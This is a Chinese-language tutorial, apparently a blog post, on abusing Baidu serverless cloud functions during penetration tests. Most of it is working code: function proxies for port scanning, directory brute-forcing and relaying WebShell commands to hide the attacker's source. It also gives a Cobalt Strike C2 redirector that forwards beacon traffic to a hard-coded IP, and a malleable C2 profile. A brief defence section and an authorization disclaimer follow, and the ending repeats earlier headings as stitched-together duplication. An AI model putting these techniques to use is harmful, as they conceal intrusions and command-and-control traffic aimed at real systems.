云函数辅助渗透测试技术详解<\/h1>

0x00 云函数基础概念<\/h2>

1. 云函数定义<\/h3>
云函数(Cloud Function)是一种基于事件触发的全托管云端计算服务，用户只需上传业务代码，无需管理服务器资源。百度云函数计算(CFC)是Serverless架构的一种实现方式。<\/p>

2. 核心特点<\/h3>

事件驱动<\/strong>：由特定事件触发执行<\/li>
无服务器架构<\/strong>：无需管理基础设施<\/li>
自动扩缩容<\/strong>：根据负载自动分配计算资源<\/li>

按需计费<\/strong>：按实际执行时间和资源消耗计费<\/li> <\/ul>
3. 百度云函数相关资源<\/h3>

控制台地址：https:\/\/console.bce.baidu.com\/cfc\/overview<\/li>
官方文档：https:\/\/cloud.baidu.com\/doc\/CFC\/index.html<\/li> <\/ul>
0x01 云函数创建与配置<\/h2>
1. 创建云函数步骤<\/h3>

进入CFC控制台，在"函数列表"中选择"创建函数"<\/li>
模板选择"空白函数"<\/li>
函数配置：

运行时选择"Python 3.6"<\/li> <\/ul> <\/li>
触发器配置：

选择"HTTP触发器"<\/li>
URL路径填写\/{filepath+}<\/code>格式<\/li> <\/ul> <\/li> <\/ol> 2. 函数处理程序结构<\/h3> 云函数中的handler()<\/code>是默认的请求处理入口函数，类似于C语言的main()<\/code>函数。<\/p> # -*- coding: utf-8 -*-<\/span> <\/span><\/span>def<\/span> handler<\/span>(event, context): <\/span><\/span> return<\/span> "Hello World"<\/span> <\/span><\/span><\/code><\/pre>3. HTTP触发器事件对象结构<\/h3> HTTP触发器会将客户端请求映射为event对象，包含以下字段：<\/p> { <\/span><\/span> "resource"<\/span>: "请求的资源路径"<\/span>, <\/span><\/span> "path"<\/span>: "HTTP触发器的路径"<\/span>, <\/span><\/span> "httpMethod"<\/span>: "请求的HTTP方法"<\/span>, <\/span><\/span> "headers"<\/span>: {请求头<\/span>}, <\/span><\/span> "queryStringParameters"<\/span>: {query<\/span> string参数<\/span>}, <\/span><\/span> "pathParameters"<\/span>: {代理路径参数<\/span>}, <\/span><\/span> "requestContext"<\/span>: {请求上下文<\/span>}, <\/span><\/span> "body"<\/span>: "请求体"<\/span>, <\/span><\/span> "isBase64Encoded"<\/span>: "请求体是否为Base64编码"<\/span> <\/span><\/span>} <\/span><\/span><\/code><\/pre>0x02 渗透测试中的应用场景<\/h2> 1. 端口扫描<\/h3> 实现原理<\/strong>：利用云函数作为代理进行端口扫描，隐藏真实IP<\/p> 云函数代码示例<\/strong>：<\/p> def<\/span> handler<\/span>(event, context): <\/span><\/span> import<\/span> socket <\/span><\/span> import<\/span> json <\/span><\/span> <\/span><\/span> params =<\/span> event['queryStringParameters'<\/span>] <\/span><\/span> target =<\/span> params.<\/span>get('target'<\/span>) <\/span><\/span> port =<\/span> int(params.<\/span>get('port'<\/span>)) <\/span><\/span> <\/span><\/span> s =<\/span> socket.<\/span>socket(socket.<\/span>AF_INET, socket.<\/span>SOCK_STREAM) <\/span><\/span> s.<\/span>settimeout(2<\/span>) <\/span><\/span> <\/span><\/span> try<\/span>: <\/span><\/span> s.<\/span>connect((target, port)) <\/span><\/span> return<\/span> {'statusCode'<\/span>: 200<\/span>, 'body'<\/span>: 'open'<\/span>} <\/span><\/span> except<\/span>: <\/span><\/span> return<\/span> {'statusCode'<\/span>: 200<\/span>, 'body'<\/span>: 'closed'<\/span>} <\/span><\/span> finally<\/span>: <\/span><\/span> s.<\/span>close() <\/span><\/span><\/code><\/pre>触发器配置<\/strong>：<\/p> 方法：GET<\/li> URL路径：\/scan<\/code><\/li> 查询参数：target<\/code>和port<\/code><\/li> <\/ul> 客户端脚本核心代码<\/strong>：<\/p> def<\/span> port_scan<\/span>(target, ports, cfc_url): <\/span><\/span> for<\/span> port in<\/span> ports: <\/span><\/span> params =<\/span> {'target'<\/span>: target, 'port'<\/span>: str(port)} <\/span><\/span> response =<\/span> requests.<\/span>get(cfc_url, params=<\/span>params) <\/span><\/span> if<\/span> response.<\/span>text ==<\/span> 'open'<\/span>: <\/span><\/span> print(f<\/span>"Port <\/span>{<\/span>port}<\/span> is open"<\/span>) <\/span><\/span><\/code><\/pre>2. 目录扫描<\/h3> 实现原理<\/strong>：利用云函数作为代理进行目录爆破，降低被封锁风险<\/p> 云函数代码示例<\/strong>：<\/p> def<\/span> handler<\/span>(event, context): <\/span><\/span> import<\/span> requests <\/span><\/span> <\/span><\/span> params =<\/span> event['queryStringParameters'<\/span>] <\/span><\/span> url =<\/span> params.<\/span>get('url'<\/span>) <\/span><\/span> path =<\/span> params.<\/span>get('path'<\/span>) <\/span><\/span> <\/span><\/span> try<\/span>: <\/span><\/span> full_url =<\/span> f<\/span>"<\/span>{<\/span>url}<\/span>\/<\/span>{<\/span>path}<\/span>"<\/span> <\/span><\/span> response =<\/span> requests.<\/span>get(full_url, timeout=<\/span>5<\/span>) <\/span><\/span> return<\/span> { <\/span><\/span> 'statusCode'<\/span>: 200<\/span>, <\/span><\/span> 'body'<\/span>: json.<\/span>dumps({ <\/span><\/span> 'url'<\/span>: full_url, <\/span><\/span> 'status'<\/span>: response.<\/span>status_code, <\/span><\/span> 'length'<\/span>: len(response.<\/span>text) <\/span><\/span> }) <\/span><\/span> } <\/span><\/span> except<\/span> Exception<\/span> as<\/span> e: <\/span><\/span> return<\/span> {'statusCode'<\/span>: 500<\/span>, 'body'<\/span>: str(e)} <\/span><\/span><\/code><\/pre>客户端脚本核心代码<\/strong>：<\/p> def<\/span> dir_scan<\/span>(target, wordlist, cfc_url): <\/span><\/span> with<\/span> open(wordlist) as<\/span> f: <\/span><\/span> paths =<\/span> f.<\/span>read().<\/span>splitlines() <\/span><\/span> <\/span><\/span> for<\/span> path in<\/span> paths: <\/span><\/span> params =<\/span> {'url'<\/span>: target, 'path'<\/span>: path} <\/span><\/span> response =<\/span> requests.<\/span>get(cfc_url, params=<\/span>params) <\/span><\/span> result =<\/span> response.<\/span>json() <\/span><\/span> if<\/span> result['status'<\/span>] ==<\/span> 200<\/span>: <\/span><\/span> print(f<\/span>"Found: <\/span>{<\/span>result['url'<\/span>]}<\/span> (Status: <\/span>{<\/span>result['status'<\/span>]}<\/span>, Length: <\/span>{<\/span>result['length'<\/span>]}<\/span>)"<\/span>) <\/span><\/span><\/code><\/pre>3. WebShell连接<\/h3> 实现原理<\/strong>：通过云函数中转WebShell流量，隐藏真实攻击源<\/p> 云函数代码示例<\/strong>：<\/p> def<\/span> handler<\/span>(event, context): <\/span><\/span> import<\/span> requests <\/span><\/span> import<\/span> base64 <\/span><\/span> <\/span><\/span> params =<\/span> event['queryStringParameters'<\/span>] <\/span><\/span> target =<\/span> params.<\/span>get('target'<\/span>) <\/span><\/span> cmd =<\/span> base64.<\/span>b64decode(params.<\/span>get('cmd'<\/span>)).<\/span>decode() <\/span><\/span> <\/span><\/span> headers =<\/span> {'User-Agent'<\/span>: 'Mozilla\/5.0'<\/span>} <\/span><\/span> data =<\/span> {'cmd'<\/span>: cmd} <\/span><\/span> <\/span><\/span> try<\/span>: <\/span><\/span> response =<\/span> requests.<\/span>post(target, headers=<\/span>headers, data=<\/span>data, timeout=<\/span>10<\/span>) <\/span><\/span> return<\/span> { <\/span><\/span> 'statusCode'<\/span>: 200<\/span>, <\/span><\/span> 'body'<\/span>: response.<\/span>text <\/span><\/span> } <\/span><\/span> except<\/span> Exception<\/span> as<\/span> e: <\/span><\/span> return<\/span> {'statusCode'<\/span>: 500<\/span>, 'body'<\/span>: str(e)} <\/span><\/span><\/code><\/pre>使用方法<\/strong>：<\/p> 在目标服务器上传WebShell<\/li> 通过云函数中转执行命令<\/li> 使用冰蝎等工具连接时配置云函数地址为代理<\/li> <\/ol> 4. Cobalt Strike上线<\/h3> 实现原理<\/strong>：利用云函数作为C2代理，隐藏真实C2服务器<\/p> 配置步骤<\/strong>：<\/p> 搭建CS服务器，配置监听器<\/p> 类型：HTTPS<\/li> 上线端口：8000<\/li> 监听端口：50050<\/li> <\/ul> <\/li> 云函数代码配置：<\/p> <\/li> <\/ol> def<\/span> handler<\/span>(event, context): <\/span><\/span> import<\/span> requests <\/span><\/span> import<\/span> base64 <\/span><\/span> <\/span><\/span> # 解码CS服务器发来的数据<\/span> <\/span><\/span> data =<\/span> base64.<\/span>b64decode(event['body'<\/span>]).<\/span>decode() <\/span><\/span> <\/span><\/span> # 转发到真实C2服务器<\/span> <\/span><\/span> c2_url =<\/span> "https:\/\/8.155.43.167:8000"<\/span> <\/span><\/span> response =<\/span> requests.<\/span>post(c2_url, data=<\/span>data) <\/span><\/span> <\/span><\/span> return<\/span> { <\/span><\/span> 'statusCode'<\/span>: 200<\/span>, <\/span><\/span> 'body'<\/span>: base64.<\/span>b64encode(response.<\/span>content).<\/span>decode() <\/span><\/span> } <\/span><\/span><\/code><\/pre> 创建profile文件(cfc.profile)：<\/li> <\/ol> https-certificate { set keystore "store.jks"; set password "password"; } http-get { set uri "\/api\/v1\/query"; client { header "Host" "your-cfc-url"; metadata { base64; prepend "SESSIONID="; header "Cookie"; } } server { header "Content-Type" "application\/octet-stream"; output { base64; print; } } } http-post { set uri "\/api\/v1\/update"; client { header "Host" "your-cfc-url"; id { base64; prepend "JSESSION="; header "Cookie"; } output { base64; print; } } server { header "Content-Type" "application\/octet-stream"; output { base64; print; } } } <\/code><\/pre> 0x03 防御与检测<\/h2> 1. 云服务提供商防御措施<\/h3> 异常流量检测<\/li> 函数调用频率限制<\/li> 敏感操作审计日志<\/li> <\/ul> 2. 企业防御建议<\/h3> 监控云函数API调用<\/li> 限制云函数出站连接<\/li> 实施最小权限原则<\/li> <\/ul> 3. 检测方法<\/h3> 异常HTTP触发器调用模式<\/li> 云函数代码中包含敏感关键词(如socket、requests等)<\/li> 云函数与已知恶意IP通信<\/li> <\/ul> 0x04 总结<\/h2> 云函数在渗透测试中的应用主要体现在以下几个方面：<\/p> 隐匿性<\/strong>：隐藏真实攻击源IP<\/li> 分布式<\/strong>：利用云服务商的全球基础设施<\/li> 弹性<\/strong>：自动扩缩容应对大规模扫描<\/li> 低成本<\/strong>：按需付费，经济高效<\/li> <\/ol> 需要注意的是，此类技术可能违反云服务商的使用条款，在实际应用中应确保获得合法授权。<\/p>

云函数辅助渗透测试技术详解<\/h1>

0x00 云函数基础概念<\/h2>

1. 云函数定义<\/h3> 云函数(Cloud Function)是一种基于事件触发的全托管云端计算服务，用户只需上传业务代码，无需管理服务器资源。百度云函数计算(CFC)是Serverless架构的一种实现方式。<\/p>

0x01 云函数创建与配置<\/h2>

0x02 渗透测试中的应用场景<\/h2>

0x03 防御与检测<\/h2>

1. 云函数定义<\/h3>
云函数(Cloud Function)是一种基于事件触发的全托管云端计算服务，用户只需上传业务代码，无需管理服务器资源。百度云函数计算(CFC)是Serverless架构的一种实现方式。<\/p>